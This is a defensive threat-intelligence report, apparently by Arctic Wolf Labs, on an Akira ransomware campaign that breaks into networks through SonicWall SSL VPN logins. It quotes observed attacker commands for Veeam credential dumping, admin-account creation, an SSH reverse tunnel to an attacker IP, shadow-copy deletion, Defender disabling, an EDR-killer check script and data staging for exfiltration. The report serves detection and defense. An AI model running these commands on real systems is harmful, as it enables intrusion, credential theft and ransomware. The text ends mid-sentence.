{ "id": "4d938884-2f24-4d09-88c8-b313a0903e93", "created_at": "2026-04-06T00:22:29.745329Z", "updated_at": "2026-04-10T03:35:21.49883Z", "deleted_at": null, "sha1_hash": "e97036fb6e296b37cf303f1b8310a41ca92dd59d", "title": "Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs, Deploys Ransomware in an Hour or Less - Arctic Wolf", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 881733, "plain_text": "Smash and Grab: Aggressive Akira Campaign Targets SonicWall VPNs,\r\nDeploys Ransomware in an Hour or Less - Arctic Wolf\r\nBy Arctic Wolf Labs\r\nPublished: 2025-09-26 · Archived: 2026-04-05 16:06:21 UTC\r\nKey Takeaways\r\nIn late July 2025, Arctic Wolf® detected a surge of malicious activity targeting environments running SonicWall\r\nfirewalls—a campaign that remains active at the time of publication.\r\nThreat actors obtained initial access through malicious SSL VPN logins with successful OTP Multi-Factor\r\nAuthentication (MFA) challenge, and deployed Akira ransomware.\r\nEarly in the kill chain, anomalous SMB activity was observed, pointing to the use of Impacket for discovery and\r\nlateral movement.\r\nVictims span across multiple sectors, showing signs of opportunistic mass exploitation.\r\nBecause dwell time is typically measured in hours, detecting and disrupting the activity early is essential to prevent\r\nransomware encryption and data theft.\r\nSummary\r\nIn late July 2025, Arctic Wolf Labs began observing a surge of intrusions involving suspicious SonicWall SSL VPN activity.\r\nMalicious logins were followed within minutes by port scanning, Impacket SMB activity, and rapid deployment of Akira\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 1 of 29\n\nransomware. Victims spanned across multiple sectors and organization sizes, suggesting opportunistic mass exploitation.\r\nThis campaign has recently escalated, with new infrastructure linked to it observed as late as September 20, 2025.\r\nSonicWall links the malicious logins observed in this campaign to CVE-2024-40766, an improper access control\r\nvulnerability identified a year ago. From this perspective, credentials would have potentially been harvested from devices\r\nvulnerable to CVE-2024-40766 and later used by threat actors—even if those same devices were patched. Threat actors in\r\nthe present campaign successfully authenticated against accounts with the one-time password (OTP) MFA feature enabled.\r\nIt is worth noting that SonicWall recently disclosed an incident involving the MySonicWall cloud backup service. While\r\nSonicWall has stated the incident was not a ransomware event, the full extent of this breach may not yet be fully known. At\r\nthis time, there is no evidence linking the MySonicWall cloud backup file incident to the Akira ransomware campaign\r\ndescribed here.\r\nWith dwell times measured in hours rather than days—among the shortest we’ve recorded for ransomware—the window for\r\neffective response against this threat is exceptionally narrow. By detecting unexpected logins from a handful of hosting-related ASNs and identifying Impacket SMB activity over the network, intrusions can be disrupted at an early stage. We\r\npresent our findings here to help organizations protect against this ongoing threat.\r\nBackground\r\nIn September 2024, shortly after the disclosure of CVE-2024-40766, we observed a series of intrusions involving SonicWall\r\nSSL VPN services that resemble the tactics seen in the current campaign. As before, staging time in the current campaign is\r\ntypically measured in minutes rather than days or weeks, with malicious logins quickly followed by data exfiltration and\r\nAkira ransomware deployment if not promptly contained.\r\nAcross dozens of recent intrusions, some aspects of post-compromise tradecraft varied, suggesting the involvement of\r\nmultiple threat actors or affiliates. Despite these differences, several recurring elements appeared in most intrusions:\r\n1. VPN client logins originating from hosting providers\r\n2. Internal network scanning\r\n3. Impacket SMB activity tied to discovery\r\n4. Active Directory discovery\r\nIn the following sections, we will provide detailed technical insight into the intrusions that emerged in this campaign. Please\r\nnote that the techniques highlighted here represent a range of intrusions likely carried out by different affiliates.\r\nWhat We Know About the Intrusions\r\nScoping the Campaign\r\nThe campaign began on July 21, 2025, and remains active at the publication time of this research. We continue to investigate\r\nand respond to new attacks through our Managed Detection and Response (MDR) service.\r\nWhile we are not able to fully scope the SonicWall models and firmware versions affected by this campaign, our\r\ninvestigations revealed malicious SSL VPN logins on NSA and TZ series devices running SonicOS 6 and 7.\r\nSonicOS Version Release Month\r\n6.5.5.1-6n January 2025\r\n7.0.1-5065 April 2022\r\n7.0.1-5119 June 2023\r\n7.1.2-7019 August 2024\r\n7.1.3-7015 January 2025\r\n7.3.0-7012 July 2025\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 2 of 29\n\nSonicWall Hardware\r\nNSa 2600\r\nNSa 2700\r\nNSa 4650\r\nNSa 5700\r\nTZ370\r\nTZ470\r\nOn July 29, around the time the ransomware campaign began to intensify, SonicWall released SonicOS version 7.3.0. While\r\nSonicWall recommended that all customers update to benefit from new protections against brute force and MFA attacks,\r\nthere were intrusions affecting devices running version 7.3.0 as well. Additionally, researchers from cybersecurity company\r\nField Effect reported that firewalls running SonicOS versions as recent as 8.0.2 were affected.\r\nFollowing our outreach to SonicWall, a product notice was issued, suggesting that the current campaign may trace back to\r\nearlier exploitation of CVE-2024-40766, impacting SonicOS 5, 6, and 7. In this scenario, credentials stolen from vulnerable\r\nfirewalls could have been carried forward to newer SonicOS versions, leaving devices exposed even after firmware updates.\r\nAlthough the credential-based mitigations suggested by SonicWall are reasonable from a best practices standpoint, we are\r\nstill not able to explain how threat actors were able to successfully bypass MFA. We will demonstrate this bypass below.\r\nInitial Access\r\nA defining hallmark of these intrusions was the presence of SSL VPN logins originating from Virtual Private Server (VPS)\r\nhosting providers. While legitimate logins typically originate from broadband, SD-WAN, or SASE service providers, logins\r\nfrom VPS infrastructure are far less likely to be benign. In some intrusions, malicious access also originated from privacy\r\nVPNs, though this was less common.\r\nInitial access was not limited to local firewall accounts; LDAP-synchronized accounts were also targeted. Notably, in\r\nseveral intrusions the dedicated account used for Active Directory synchronization was observed logging in via SSL VPN,\r\ndespite not being intentionally configured for such access. In over half of the intrusions analyzed, we observed login\r\nattempts against accounts with the One Time Password (OTP) feature enabled. OTP is an MFA feature implemented within\r\nSonicOS.\r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04 02:12:52\"\r\nfw=REDACTED_FW_IP pri=6 c=0 gcat=13 m=1153 src=0.0.0.0\r\ndst=38.114.123.167 msg=\"User : User needs one-time password\"\r\nn=11070\r\nTypically, less than a minute after an OTP challenge, a corresponding OTP login event is generated along the following\r\nlines:\r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04 02:13:35\"\r\nfw=REDACTED_FW_IP pri=6 c=0 gcat=13 m=1153 srcV6=:: dstV6=::\r\nmsg=\"User REDACTED_USERNAME: otp login\" n=11071\r\nAn ‘SSL VPN zone remote user login allowed’ (event ID 1080) message typically appears after successful\r\nusername/password validation and OTP authentication (when enabled), followed by device profile matching and IP\r\nassignment events.\r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04 02:13:35\"\r\nfw=REDACTED_FW_IP pri=6 c=0 gcat=4 m=1080 msg=\"SSL VPN zone\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 3 of 29\n\nremote user login allowed\" src=38.114.123[.]167::X1\r\ndst=REDACTED_PUBLIC_IP::X3 usr=\"REDACTED_USERNAME\"\r\nsess=\"sslvpnc\" dur=0 note=\"User: REDACTED_USERNAME\" n=121\r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04\r\n02:13:3502:13:35\" fw=REDACTED_FW_IP pri=6 c=0 gcat=13 m=1153\r\nsrc=REDACTED_INTERNAL_IP dst=0.0.0.0 msg=\"User\r\nREDACTED_USERNAME: SSLVPN client matched device profile\r\nDefault Device Profile for Windows\" n=11072\r\n \r\nid=REDACTED_FW_NAME sn=REDACTED_SN time=\"2025-08-04\r\n02:1302:13:17\" fw=REDACTED_FW_IP pri=6 c=0 gcat=13 m=1153\r\nsrc=REDACTED_INTERNAL_IP dst=38.114.123[.]167\r\nusr=\"REDACTED_USERNAME\" sess=\"sslvpnc\" msg=\"User\r\nREDACTED_USERNAME: is assigned IP: REDACTED_INTERNAL_IP\"\r\nn=11073\r\nWhat About MFA?\r\nWhile publicly known details are limited around the scope of CVE-2024-40766, SonicWall’s August 2025 product notice\r\nconfirmed that exploitation could enable abuse of administrative functions such as configuration backup, creating\r\nopportunities for credential-based attacks.\r\nSonicWall has also confirmed that devices running versions of SonicOS prior to 7.3 may have been susceptible to brute\r\nforce attacks affecting MFA credentials. While MFA is intended to thwart credential-based attacks, it can still be attacked\r\nunder certain circumstances. For example, Google Threat Intelligence Group recently uncovered a campaign affecting\r\nSonicWall SMA demonstrating that if OTP seeds are obtained by threat actors, they can be used to generate valid OTP\r\ntokens.\r\nCredential-based attacks are well established in ransomware; threat actors affiliated with Black Basta, for example, have\r\nbeen known to conduct online brute-force campaigns against live firewall appliances and servers running Remote Desktop\r\nProtocol (RDP). Additionally, offline hash cracking offers anonymity and avoids rate limits imposed by live appliances.\r\nSimilar considerations apply to credentials stolen in this campaign.\r\nIn our investigation, we observed repeated malicious SSL VPN logins on accounts with OTP MFA enabled, ruling out\r\nscratch code usage in those cases. We also found no signs of malicious use of the compromised accounts prior to SSL VPN\r\nlogin (event ID 1080), nor did we observe unauthorized OTP unbinding events or other malicious configuration changes\r\n(event ID 1382) in the five days leading up to the intrusions. Taken together, the evidence points to the use of valid\r\ncredentials rather than modification of OTP configuration, though the exact method of authenticating against MFA-enabled\r\naccounts remains unclear.\r\nHints of Automated Exploitation\r\nIn some instances, multiple login events were observed in quick succession across a variety of accounts, with repeated\r\nsuccessful logins tied to the same VPN client IP address. This evenly spaced periodic activity is not typical of legitimate use\r\nand raises the possibility of automated authentication against compromised accounts through scripting.\r\nPeriodic access of this nature was not consistently observed across all intrusions, however; in most instances, one to two\r\nSSL VPN accounts were maliciously accessed.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 4 of 29\n\nFigure 1: Malicious SSL VPN login activity spaced out over consistent intervals across multiple user accounts, all\r\noriginating from the same client IP address.\r\nDiscovery and Lateral Movement\r\nUpon gaining SSL VPN access, threat actors wasted no time in attempting lateral movement through compromised\r\nenvironments, typically initiating internal scanning within five minutes of logging in. Although early scanning originated\r\nfrom VPN client IP addresses, tools such as SoftPerfect Network Scanner and Advanced IP Scanner were also deployed in\r\nsome instances to Windows servers under the %Temp%, Downloads, or Desktop directories.\r\nC:\\\\Users\\\\REDACTED\\\\AppData\\\\Local\\\\Temp\\\\3\\\\Advanced IP\r\nScanner 2\\\\advanced_ip_scanner.exe\r\nScanned ports included 135 (RPC), 137 (Netbios), 445 (SMB), and 1433 (SQL). Along with this internal scanning activity,\r\nSMBv2 session setup requests were observed, exhibiting a signature consistent with use of the Python Impacket library. The\r\nhostnames observed in these SMB events included:\r\nkali\r\nWIN\r\nDESKTOP-HPLM2TD\r\nWINUTIL\r\nDESKTOP-A2S6P81\r\nWIN-V1L65ED9I55\r\nWIN-5VVC95LFP2G\r\nDESKTOP-EDE0RR5\r\nSome of these same hostnames were observed in the following types of activity:\r\nFailed SMB network logins: event ID 4625 (logon type 3)\r\nSuccessful SMB network logins: event ID 4624 (logon type 3)\r\nRDP login activity: event ID 4624 (logon type 10)\r\nRDP was the tool of choice for lateral movement through compromised environments.\r\nFurther evidence of Impacket usage was found in the form of quser commands with output redirected to a filename with a\r\nsix-character randomized string in mixed case, consistent with WMIExec usage.\r\nC:\\Windows\\System32\\cmd.exe /Q /c quser 1\u003e\r\n\\Windows\\Temp\\RANDOMIZED_STRING 2\u003e\u00261\r\nActive Directory Enumeration\r\nDiscovery of Active Directory (AD) objects was conducted through built-in tools such as nltest, dsquery, and the PowerShell\r\nGet-ADUser and Get-ADComputer cmdlets.\r\nGet-ADUser -Filter * -Properties * | Select-Object Enabled, CanonicalName,\r\nCN, Name, SamAccountName, MemberOf, Company, Title, Description, Created,\r\nModified, PasswordLastSet, LastLogonDate, logonCount, Department,\r\ntelephoneNumber, MobilePhone, OfficePhone, EmailAddress, mail,\r\nHomeDirectory, homeMDB \u003e C:\\ProgramData\\AdUsers.txt\r\nGet-ADUser -Filter * -Properties * | Select-Object Enabled, CanonicalName,\r\nCN, Name, SamAccountName, MemberOf, Company, Title, Description, Created,\r\nModified, PasswordLastSet, LastLogonDate, logonCount, Department,\r\ntelephoneNumber, MobilePhone, OfficePhone, EmailAddress, mail,\r\nHomeDirectory, homeMDB \u003e\u003e C:\\ProgramData\\REDACTED_Users.txt\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 5 of 29\n\nGet-ADComputer -Filter * -Property * | Select-Object Enabled, Name,\r\nDNSHostName, IPv4Address, OperatingSystem, Description, CanonicalName,\r\nservicePrincipalName, LastLogonDate, whenChanged, whenCreated \u003e\u003e\r\nC:\\ProgramData\\REDACTED_Comps.txt\r\nFor share enumeration, SharpShares (a multi-threaded open-source AD reconnaissance tool) was used.\r\nC:\\programdata\\SharpShares.exe /ldap:all /filter:netlogon,ipc$,print$\r\n/threads:1000 /outfile:C:\\programdata\\tb.txt\r\nNOTEPAD.EXE C:\\ProgramData\\tb.txt\r\nFurther enumeration was conducted using tools such as NetExec, BloodHound, and ldapdomaindump. In some instances,\r\nthreat actors reviewed the outputs of such tools in notepad.\r\nExtracting VM credentials\r\nOne of the threat actor’s goals was to gain access to virtual machine (VM) storage and backups. In principle, achieving this\r\nwould provide threat actors with access to sensitive data as well as domain credentials stored in the filesystem of domain\r\ncontrollers. However, in the majority of observed intrusions, administrator access was obtained through other means prior to\r\nVM credential extraction.\r\nIn some instances, the sqlcmd utility was used to access Veeam Backup \u0026 Replication credentials stored in a SQL server,\r\nrunning as a domain administrator account.\r\nsqlcmd -S localhost\\REDACTED_USERNAME -E -y500 -s \";\" -Q\r\n\"SELECT * FROM [VeeamBackup].[dbo].[Credentials];\"\r\nWe also observed execution of a previously unseen PowerShell script that automated the process of credential extraction\r\nfrom the Veeam database, supporting both MSSQL and PostgreSQL backends. The PowerShell script is commented and\r\nprovides color-coded output for success and failure. It demonstrates the ability to extract encrypted credentials from versions\r\n11 and 12 of Veeam Backup \u0026 Replication, with support for decrypting DPAPI secrets stored on the local machine, as well\r\nas newer Base64-encoded formats.\r\nNewer versions of Veeam use an encryption salt—random data fed as an additional input to a one-way function that hashes\r\ndata, a password or passphrase. The script attempts to retrieve the necessary salt for decryption where applicable, searching\r\nthrough several filesystem locations.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 6 of 29\n\nFigure 2: The Get-EncryptionSalt PowerShell function retrieves the encryption salt from the file system, checking multiple\r\npotential storage locations. (For a full source file, see the Appendix.)\r\nNotably, if a PostgreSQL Veeam installation is detected, the credential recovery script attempts to temporarily modify the\r\ndatabase configuration to allow connections from all loopback interfaces for IPv4 and IPv6. This configuration change\r\nincludes a comment in the modified configuration of “# Veeam Credential Recovery – Temp Trust Rules [Added $(Get-Date)]”, where the Get-Date cmdlet populates the date at the time of script execution. Upon completion of script execution,\r\na backup version of the PostgreSQL configuration is restored.\r\nFigure 3: The Enable-PgTrustAuth PowerShell function is used to temporarily allow PostgreSQL administrative connections\r\nfrom any IPv4 or IPv6 address, backing up the original configuration before applying changes. (For a full source file, see\r\nthe Appendix.)\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 7 of 29\n\nFor both MSSQL and PostgreSQL, only the user_name, password, and description fields are selected when retrieving\r\ncredentials, in contrast with the sqlcmd activity described earlier.\r\nFigure 4: Veeam credentials stored in the database are retrieved, with different queries depending on whether PostgreSQL\r\nor MS SQL are used. (For a full source file, see the Appendix.)\r\nPersistence and C2\r\nThreat actors were observed creating local administrator accounts using net.exe on VM backup servers hosting applications\r\nsuch as Veeam Backup \u0026 Replication, as well as other Windows servers related to VM administration, using account names\r\nlike sqlbackup and veean, to blend into the environment.\r\nThreat actors also created domain accounts, elevating some to administrative groups like ESX Admins. These accounts were\r\nlater used for data exfiltration and to install RMM tools, including AnyDesk and TeamViewer.\r\nnet user sqlbackup REDACTED /add\r\nnet localgroup administrators sqlbackup /add\r\nnet group \"ESX Admins\" REDACTED_USERNAME /domain /add\r\nrunas /netonly /user:REDACTED_DOMAIN\\REDACTED_USERNAME cmd\r\nAs an example, an AnyDesk installer was downloaded to ProgramData using PowerShell:\r\n“C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -command\r\n\"(new-object\r\nSystem.Net.WebClient).DownloadFile('hxxp://download[.]anydesk[.]com/AnyDesk\r\n.exe';, 'C:\\ProgramData\\AnyDesk.exe')\"\r\nWe also observed some instances of the open source RustDesk RMM tool being installed by threat actors using a batch\r\nscript:\r\n\"C:\\Windows\\System32\\cmd.exe\" /C\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RustDesk_install.bat\r\nsc create RustDesk binpath= \"\\\"C:\\Program Files\\RustDesk\\RustDesk.exe\\\"\r\n--import-config\r\n\\\"C:\\Users\\Administrator\\AppData\\Roaming\\RustDesk\\config\\RustDesk.toml\\\r\n\"\" start= auto DisplayName= \"RustDesk Service\"\r\nAs seen in previous campaigns, SSH reverse tunnels were used in several instances as a persistence mechanism, spawning\r\nfrom an interactive cmd prompt:\r\nssh -R 5555 root@170.130.165[.]42\r\nThese commands were typically executed under a domain account recently created by the threat actor.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 8 of 29\n\nIn other cases, cloudflared, the open source Cloudflare Tunnel client, was used to bypass the NAT, running from Active\r\nDirectory domain controllers. This presumably was done to provide access to the compromised network via SSH, judging by\r\nthe path that the cloudflared software was installed under: C:\\ProgramData\\ssh. To facilitate remote access, the OpenSSH\r\nservice was configured to listen on the wildcard address of 0.0.0.0.\r\nThe following commands were used to establish the tunnel, configure the host-based firewall, and install a persistent service.\r\nC:\\ProgramData\\ssh\\cloudflared[.]exe.exe tunnel run --token\r\nREDACTED_BASE64_TOKEN\r\nNew-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server\r\n(sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action\r\nAllow -LocalPort 22\r\n \r\ncloudflared[.]exe service install REDACTED\r\n_BASE64_TOKEN\r\nIn some instances, we observed a PowerShell script that automated the process of installing cloudflared as a service. The\r\nPowerShell script included comments such as “Alternative download URLs in case GitHub is blocked”, although only\r\nGitHub download URLs were provided. Downloads were attempted using the Invoke-WebRequest built in cmdlet, falling\r\nback to Start-BitsTransfer if the initial download was unsuccessful.\r\nThe script then attempts to install both the MSI and executable versions of cloudflared and wraps up with the installation of\r\na corresponding service using the working directory of the script as the destination. Interestingly, the command line\r\ninvocation of msiexec configures a log file to be captured for the MSI installation, which is saved in ProgramData with the\r\nfilename cloudflared_msi_install.log.\r\nFigure 5: A PowerShell script that retrieves the Cloudflare Tunnel installer file and installs it silently.\r\nDefense Evasion\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 9 of 29\n\nThreat actors attempted to hamper the response of IT staff and other defenders by disabling legitimate RMM tools such as\r\nSplashtop on servers they were interacting with, such as VM storage and backup servers. Volume Shadow Copy snapshots\r\nwere deleted to impair the ability to restore data from backups, using the deprecated Get-WmiObject and Remove-WmiObject PowerShell cmdlets.\r\npowershell.exe -Command Get-WmiObject Win32_Shadowcopy | Remove-WmiObject\r\nThreat actors were observed disabling User Account Control (UAC) for local accounts using the\r\nLocalAccountTokenFilterPolicy registry key. This allowed remote use of full admin rights for local accounts.\r\nreg add\r\n\\\"HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Pol\r\nicies\\\\System\\\" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\r\nAcross multiple instances, threat actors attempted to disable endpoint detection and response (EDR) tooling and Windows\r\nDefender.\r\nSet-MpPreference -DisableRealtimeMonitoring $true -\r\nDisableBehaviorMonitoring $true -DisableArchiveScanning $true -\r\nDisableScriptScanning $true -DisableBlockAtFirstSeen $true -\r\nDisableIOAVProtection $true -MAPSReporting Disabled -\r\nSubmitSamplesConsent 2\r\nThreat actors also evaded defenses using the bring-your-own-vulnerable-driver (BYOVD) technique. They repackaged\r\nMicrosoft’s consent.exe and ran it from directories disguised as legitimate EDR software. These binaries were often\r\nexecuted from unusual filesystem locations, typically named after a legitimate EDR solution or other legitimate software as\r\na disguise:\r\nC:\\Users\\Administrator\\Desktop\\New folder\\CrowdStrike\\consent.exe\r\nC:\\Users\\Administrator\\Downloads\\Sentinel\\Sentinel\\consent.exe\r\nC:\\programdata\\knowbe4\\adisync\\config\\sentinel\\sentinel\\consent.exe\r\nC:\\ProgramData\\AADConnect\\Sentinel\\Sentinel\\consent.exe\r\nC:\\ProgramData\\HP\\Installer\\Sentinel\\Sentinel\\consent.exe\r\nIn some instances, threat actors utilized a RAR archive named “sentsoph.rar” containing folders named “Sophos” and\r\n“Sentinel”. Each of those two folders contained consent.exe, a Windows batch file to clear event logs\r\n(clean_log_admin.bat), and a DLL file named wmsgapi.dll or msimg32.dll. This DLL file is then used to load a vulnerable\r\ndevice driver (often named rwdrv.sys or churchill_driver.sys) located in %temp% with the goal of disabling EDR.\r\nC:\\Users\\Admin\\AppData\\Local\\Temp\\churchill_driver.sys\r\nC:\\Users\\Admin\\AppData\\Local\\Temp\\rwdrv.sys\r\nOne additional batch file was also observed within some of the RAR archives, serving as a check to identify if the device is\r\nrunning in a Hyper-V environment. Hyper-V is Microsoft’s enterprise-grade hypervisor, providing hardware virtualization\r\ncapabilities that enable organizations to create, manage, and run virtual machines at scale. If a registry key for hypervisor-protected code integrity (HVCI) feature exists, the batch file instructs the threat actor using it to proceed with running an\r\nEDR killer.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 10 of 29\n\n@echo off\r\nsetlocal\r\n:: Check if the HVCI registry key exists\r\nreg query\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\r\n\\HypervisorEnforcedCodeIntegrity\" \u003e nul 2\u003e\u00261\r\nif %ERRORLEVEL% neq 0 (\r\n echo HVCI registry key does not exist. HVCI is NOT enabled. ALL IS GOOD!\r\n exit /b\r\n)\r\n:: Check the value of the key\r\nfor /f \"tokens=2*\" %%A in ('reg query\r\n\"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\r\n\\HypervisorEnforcedCodeIntegrity\" /v \"Enabled\"') do (\r\n set value=%%B\r\n)\r\nif \"%value%\"==\"0x1\" (\r\n echo HVCI is ENABLED on this system. DONT RUN THE KILLER.\r\n) else (\r\n echo HVCI is NOT ENABLED on this system. FUCK IT RIGHT NOW.\r\n)\r\npause\r\nThe consent.exe executables had valid Authenticode digital signatures and were signed by Microsoft, revealed by its version\r\nmetadata to be part of the Microsoft Windows 7 SP1 operating system. In this EDR bypass mechanism, consent.exe acts as a\r\nlauncher, which requests administrator privileges before loading a malicious DLL named msimg32.dll or wmsgapi.dll.\r\nThis malicious DLL was packed, potentially with Movfuscator or a similar tool, and employs anti-debugging techniques to\r\nhamper analysis. All these files had been archived in a RAR archive bearing the same filename as the folders they were\r\ncreated in (e.g., Sentinel.rar).\r\nOne of the first checks performed by the malicious DLL queries the system locale with GetSystemDefaultLocaleName(),\r\nterminating execution if the result matches a long list of hardcoded Eastern European and Central Asian locales. This\r\ngeofencing technique is a common practice observed in other targeted ransomware attacks, although more often observed\r\nlater in the kill chain at the level of the ransomware encryptor binary itself. We include a full list of these excluded locales in\r\nthe appendix.\r\nOnce active, the malicious DLL drops two kernel drivers into the Windows %temp% directory. The first driver, rwdrv.sys, is\r\na vulnerable but legitimate driver used for privilege escalation and kernel access. The second driver, hlpdrv.sys,\r\ncommunicates with the malicious DLL to receive targeted process information. Using IRP packets, the malware identifies\r\nspecific security processes (e.g., MsMpEng.exe and SecurityHealthService.exe) and then weaponizes Windows Access\r\nControl Lists (ACLs) at the kernel level to disable them.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 11 of 29\n\nFigure 6: SysInternals DebugView output showing a malicious driver being loaded and ACL tampering to disable security\r\nprocesses.\r\nThe hlpdrv.sys driver calls ZwCreateFile() with the WRITE_DAC flag, enabling it to rewrite a file’s security descriptor. It\r\nthen constructs an empty ACL using RtlCreateAcl(), sets this into a new security descriptor, and applies it to the target with\r\nZwSetSecurityObject(). The net result is the ability to render a file or process path completely inaccessible in user mode,\r\neffectively neutering security software without directly killing processes or deleting files.\r\nFigure 7: Error message showing Windows Defender’s core process (MsMpEng.exe) being blocked after ACL tampering by\r\nthe malicious driver.\r\nData Staging and Exfiltration\r\nThreat actors used WinRAR to package files for exfiltration. To do this, they placed WinRAR installers on file servers,\r\ndomain controllers, and other systems running Windows Server OS. In some instances, the WinRAR installation binary was\r\nplaced in the ProgramData directory.\r\nC:\\ProgramData\\winrar-x64-712.exe\r\nThese are the command switches that were used by the threat actor to archive data being staged for exfiltration:\r\na – Add files to archive. Creates a new archive or adds to an existing one.\r\nm0 – Files are stored without compression.\r\nv3g – Splits archive into 3 GB chunks.\r\ntn365d – Only archives files from the past year.\r\nn*.txt -n*.pdf… – Only archives text files, PDF files, Office files, and database files.\r\nwinrar.exe a -m0 -v3g -tn365d -n*.txt -n*.pdf -n*.xls -n*.doc -n*.xlsx\r\n-n*.docx -n*.BAK -n*.MDB \"C:\\Data\" \"\\\\\"\u003credacted\u003e\"\r\nThreat actors were observed extracting the rclone binary from a zip file using WinRAR. They then proceeded to exfiltrate\r\nvictim data using rclone to virtual private server infrastructure.\r\n\"C:\\Program Files\\\\WinRAR\\\\WinRAR.exe\\\" x -iext -ver -imon1 --\r\n\"C:\\ProgramData\\rclone.zip\" C:\\ProgramData\\rclone\\\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 12 of 29\n\nC:\\ProgramData\\rclone\\rclone.exe\r\nIn other instances, FileZilla was the tool of choice for exfiltration. FileZilla was installed to the standard Program Files\r\nlocation.\r\nC:\\Users\\REDACTED\\Downloads\\FileZilla_3.69.2_win64_sponsored2-\r\nsetup.exe\r\nC:\\Program Files\\FileZilla FTP Client\\fzsftp.exe\r\nUsing the FileZilla sftp client fzsftp.exe, RAR archives were transferred by the threat actor over SSH to a VPS server under\r\ntheir control.\r\nRansomware Encryption\r\nRansomware was deployed while specifying the drive of the targeted device as well as a text file of all the connected\r\nnetwork shares in a separate command.\r\nakira.exe -n=1 -p=D:\\\\\r\nakira.exe -n=1 -s=share.txt\r\nIn other instances, ransomware deployment was mapped to the executable locker.exe and executed in a command per drive\r\nencrypted.\r\nlocker.exe -p=F:\\\\ -n=5\r\nlocker.exe -p=G:\\\\ -n=5\r\nThe ransomware encryptor binary was deployed to multiple locations, including C:\\lock and C:\\ProgramData. Binary\r\nfilenames included akira.exe, locker.exe, and w.exe.\r\nIn almost all intrusions, ransomware encryption took place in under four hours from initial access, with a staging interval as\r\nshort as 55 minutes in some instances.\r\nRecommendations\r\nEarly in this campaign, Arctic Wolf issued a security bulletin warning customers and the broader industry about the uptick in\r\nmalicious SonicWall SSL VPN logins that we observed. We have since updated our bulletin to incorporate SonicWall’s latest\r\nrecommendations.\r\nThe most crucial mitigation to this threat is to reset all SSL VPN credentials on SonicWall devices that have ever run\r\nfirmware vulnerable to CVE-2024-40766, as well as Active Directory credentials on accounts used for SSL VPN access and\r\nLDAP synchronization.\r\nOrganizations should also consider SonicWall’s guidance on the MySonicWall cloud backup file incident and determine on a\r\ncase-by-case basis if any serial numbers were affected. While SonicWall has stated that this incident was not a ransomware\r\nevent, the remediation instructions and credential reset procedure are similar to that of CVE-2024-40766. Organizations\r\nusing the MySonicWall cloud backup feature are strongly advised to reset credentials as instructed by SonicWall.\r\nEarly detection is critical in this campaign, and to that end we recommend monitoring for hosting-related ASNs in\r\nSonicWall SSL VPN logins. Additionally, monitoring for SMB session setup requests consistent with Impacket provides an\r\nearly kill chain detection for discovery activity related to this campaign.\r\nAs a best practice, if your organization does not conduct business in specific regions, block VPN logins originating from\r\nthose countries outright. This reduces the attack surface for opportunistic exploitation campaigns such as this one.\r\nhttps://arcticwolf.com/resources/blog/smash-and-grab-aggressive-akira-campaign-targets-sonicwall-vpns/\r\nPage 13 of 29\n\nFinally, consider blocking logins from infrastructure linked to virtual private servers (VPS) hosting providers and\r\nanonymization services. These IP ranges are frequently abused for credential-stuffing and brute-force attacks, while\r\nlegitimate business use is rare.\r\nArctic Wolf did not observe malicious logins of accounts using SSO/SAML for VPN authentication. This suggests that\r\nseparating identity management from firewall appliances can reduce risk and should be considered as a hardening strategy.\r\nHow Arctic Wolf Protects Its Customers\r\nArctic Wolf is committed to ending cyber risk, and when new ransomware campaigns are identified we act decisively to\r\nprotect our customers. Arctic Wolf already had detections in place for the core techniques employed in this campaign before\r\nit began, and we were therefore able to detect and respond early and effectively on behalf of our customers.\r\nAdditionally, as always, we have incorporated the new threat intelligence collected from this SonicWall SSL VPN\r\nransomware campaign to augment and improve the detection capabilities of our platform.\r\nDetection Opportunities\r\nAs part of our Managed Detection and Response (MDR) service, Arctic Wolf has detections in place for the techniques\r\ndescribed in this blog, in addition to other techniques employed by the same ransomware threat actors to whom this\r\ncampaign has been attributed.\r\nFirewall\r\nDuring our investigations, we observed threat actors logging into SonicWall SSL VPN accounts via a handful of hosting-related ASNs. In situations where organizations don’t have a valid business reason to allow logins from these specific ASNs,\r\nlogin attempts can be blocked outright or otherwise used for detection 